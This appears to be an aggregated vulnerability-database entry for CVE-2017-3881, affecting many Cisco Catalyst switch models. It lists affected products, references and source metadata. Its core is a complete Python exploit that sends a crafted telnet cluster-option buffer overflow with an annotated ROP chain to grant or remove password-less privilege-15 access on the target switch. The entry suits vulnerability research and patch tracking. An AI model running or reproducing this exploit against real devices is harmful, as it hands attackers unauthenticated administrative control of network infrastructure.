vendor:	cisco	model:	catalyst 2960c-12pc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 48tc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 48tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 48pst-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 48pst-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 24tc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 24tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 24pc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 24pc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 24lc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-plus 24lc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-8tc-s compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-8tc-l compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-48tt-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-48tt-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-48tc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-48tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-48pst-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-48pst-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24tt-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24tc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24pc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24pc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24lt-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24lc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960-24-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2928-24tc-c switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2918-48tt-c switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2918-48tc-c switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2918-24tt-c switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2918-24tc-c switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2360-48td-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2350-48td-sd switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2350-48td-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ios xe 15.2 e2	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	ios 15.2 e2	scope:	ne	version:	-	Trust: 0.3

sources: BID: 96960 // PACKETSTORM: 142132 // PACKETSTORM: 142121 // EXPLOIT-DB: 42122

EXPLOIT

#!/usr/bin/python
# Author:
# Artem Kondratenko (@artkond)

import socket
import sys
from time import sleep

set_credless = True

if len(sys.argv) < 3:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
elif sys.argv[2] == '--unset':
set_credless = False
elif sys.argv[2] == '--set':
pass
else:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))

print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'

print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'

payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
else:
payload += '\x00\x04\xea\x58' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
payload += '\x00\x04\xe6\xf0' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'

s.send(payload)

print '[+] All done'

s.close()

Trust: 1.0

sources: EXPLOIT-DB: 42122

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 42122

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 42122

TYPE

code execution

Trust: 1.0

sources: PACKETSTORM: 142132 // PACKETSTORM: 142121

CREDITS

Artem Kondratenko

Trust: 1.0

sources: EXPLOIT-DB: 42122

EXTERNAL IDS

db:	NVD	id:	CVE-2017-3881	Trust: 2.3
db:	EXPLOIT-DB	id:	42122	Trust: 1.0
db:	PACKETSTORM	id:	142132	Trust: 0.5
db:	PACKETSTORM	id:	142121	Trust: 0.5
db:	ICS CERT	id:	ICSA-17-094-03	Trust: 0.3
db:	BID	id:	96960	Trust: 0.3

sources: BID: 96960 // PACKETSTORM: 142132 // PACKETSTORM: 142121 // EXPLOIT-DB: 42122

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2017-3881	Trust: 2.0
url:	https://github.com/artkond/cisco-rce/blob/d4f71e17aae2d5d411e47ca213f11a61fa17a3ec/c2960-lanbasek9-m-12.2.55.se1.py	Trust: 1.0
url:	https://ics-cert.us-cert.gov/advisories/icsa-17-094-03	Trust: 0.3
url:	http://www.cisco.com/	Trust: 0.3
url:	https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170317-cmp	Trust: 0.3

sources: BID: 96960 // PACKETSTORM: 142132 // PACKETSTORM: 142121 // EXPLOIT-DB: 42122

SOURCES

db:	BID	id:	96960
db:	PACKETSTORM	id:	142132
db:	PACKETSTORM	id:	142121
db:	EXPLOIT-DB	id:	42122

LAST UPDATE DATE

2022-07-27T09:11:32.728000+00:00

SOURCES UPDATE DATE

db:

BID

id:

96960

date:

2017-06-05T18:01:00

SOURCES RELEASE DATE

db:	BID	id:	96960	date:	2017-03-17T00:00:00
db:	PACKETSTORM	id:	142132	date:	2017-04-13T23:02:22
db:	PACKETSTORM	id:	142121	date:	2017-04-13T02:16:13
db:	EXPLOIT-DB	id:	42122	date:	2017-04-12T00:00:00

tag:	Remote	Trust: 2.0
tag:	exploit	Trust: 1.0
tag:	code execution	Trust: 1.0

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE